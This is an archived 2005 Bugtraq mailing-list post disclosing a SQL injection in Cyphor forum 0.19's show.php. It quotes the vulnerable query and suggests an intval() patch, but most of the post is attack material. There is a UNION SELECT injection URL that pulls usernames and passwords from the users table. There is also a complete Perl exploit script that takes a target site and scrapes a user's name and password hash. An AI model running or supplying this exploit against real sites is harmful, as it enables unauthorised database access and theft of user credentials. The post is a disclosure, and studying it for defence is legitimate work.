lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20051113192127.19612.qmail@securityfocus.com>
Date: 13 Nov 2005 19:21:27 -0000
From: s2b@...mail.com
To: bugtraq@...urityfocus.com
Subject: Cyphor  (Release: 0.19) Sql injection


Hello

This is sql injection in cyphor

Discovered by : HACKERS PAL

Greets For Devil-00 - Abducter - Almaster
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injected vresions :-
Cyphor  (Release: 0.19) and all Versions Up To now
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injected File
show.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injection code :-
show.php?fid=2&id=-10%20union%20select%20id,null,null,null,null,nick,password,null,null,null%20from%20users%20where%20id=1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Discovering the vul :-
searching in show.php file in line 59 to 62 as below

[/code]
    if ($id) {
        // a message with id=$id will be displayed
        $message_mode = 1;
        $query = "SELECT * FROM $db_table_name WHERE id=$id";
[/code]

The Programmed Didont Check The $id Variable .. if it was integer
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
How to protect :-

after 
        $message_mode = 1;

add
	// Script Protection By : HACKERS PAL
$id=intval($id);
if(!$id)
{
	die("<br>We Dont allow Skript Kidz .. <br> By <a hre='Http://www.sqor.net'>HACKERS PAL</a>");
}
	// !/script Porotection By : HACKERS PAL fINISHED
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
exploit :-

#!/bin/env perl

#//-----------------------------------------------------------#

#//        Cyphor Forum SQL Injection Exploit .. By HACKERS PAL

#//                   Greets For Devil-00 - Abducter - Almaster

#//                          http://WwW.SoQoR.NeT

#//-----------------------------------------------------------#



use LWP::Simple;



print "\n#####################################################";

print "\n#      Cyphor Forum Exploit By : HACKERS PAL        #";

print "\n#               Http://WwW.SoQoR.NeT                #";



if(!$ARGV[0]||!$ARGV[1]) {

print "\n# -- Usage:                                         #";

print "\n# -- perl $0 [Full-Path] 1                      #";

print "\n# -- Example:                                       #";

print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";

print "\n#     Greets To Devil-00 - Abducter - almastar      #";

print "\n#####################################################\n";

    exit(0);

}

else

{

print "\n#     Greets To Devil-00 - Abducter - almastar      #";

print "\n#####################################################\n";



        $web=$ARGV[0];
        $id=$ARGV[1];

$url = "show.php?fid=2&id=-10%20union%20select%20id,2,3,4,5,nick,password,8,id,10%20from%20users%20where%20id=$id";

            $site="$web/$url";

$page = get($site) || die "[-] Unable to retrieve: $!";

print "\n[+] Connected to: $ARGV[0]\n";



print "[+] User ID is : $id ";

$page =~ m/<span class=bigh>(.*?)<\/span>/ && print "\n[+] User Name is: $1\n";

print "\n[-] Unable to retrieve User Name\n" if(!$1);

$page =~ m/<span class=message>(.*?)<\/span>/ && print "[+] Hash of password is: $1\n";

print "[-] Unable to retrieve hash of password\n" if(!$1);



}



print "\n\nGreets From HACKERS PAL To you :)\nWwW.SoQoR.NeT . . . You Are Welcome\n\n";

#finished


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ